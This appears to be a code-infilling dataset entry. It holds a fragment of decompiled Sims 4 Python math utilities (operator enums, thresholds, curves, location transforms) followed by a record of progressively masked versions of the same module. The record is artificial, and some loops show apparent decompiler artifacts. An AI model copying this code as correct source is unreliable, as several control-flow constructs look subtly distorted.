return Operator.LESS
if self == Operator.LESS:
return Operator.LESS
class InequalityOperator(enum.Int):
__qualname__ = 'InequalityOperator'
GREATER = Operator.GREATER
GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL
LESS_OR_EQUAL = Operator.LESS_OR_EQUAL
LESS = Operator.LESS
with InequalityOperator.__reload_context__(InequalityOperator, InequalityOperator):
InequalityOperator.from_function = Operator.from_function
InequalityOperator.function = Operator.function
InequalityOperator.inverse = Operator.inverse
InequalityOperator.symbol = Operator.symbol
InequalityOperator.category = Operator.category
class Threshold:
__qualname__ = 'Threshold'
__slots__ = ('value', 'comparison')
def __init__(self, value=None, comparison=None):
self.value = value
self.comparison = comparison
def compare(self, source_value):
if self.value is not None and self.comparison is not None:
return self.comparison(source_value, self.value)
return False
def compare_value(self, source_value):
if self.value is not None and self.comparison is not None:
return self.comparison(source_value.value, self.value.value)
return False
def inverse(self):
return Threshold(self.value, Operator.from_function(self.comparison).inverse.function)
def __str__(self):
if self.comparison is None:
return 'None'
return '{} {}'.format(Operator.from_function(self.comparison).symbol, self.value)
def __repr__(self):
return '<Threshold {}>'.format(str(self))
def __eq__(self, other):
if not isinstance(other, Threshold):
return False
if not self.value == other.value:
return False
if not self.comparison == other.comparison:
return False
return True
def __hash__(self):
return hash((self.value, self.comparison))
|
normal
|
{
"blob_id": "a0310b1bab339064c36ff0fe92d275db7a6c5ba9",
"index": 8734,
"step-1": "<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-2": "<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-3": "<mask token>\n\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta / step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i * delta / num\n else:\n yield start\n if stop != start:\n yield stop\n\n\n<mask token>\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\n<mask token>\n\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\n<mask token>\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\n<mask token>\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
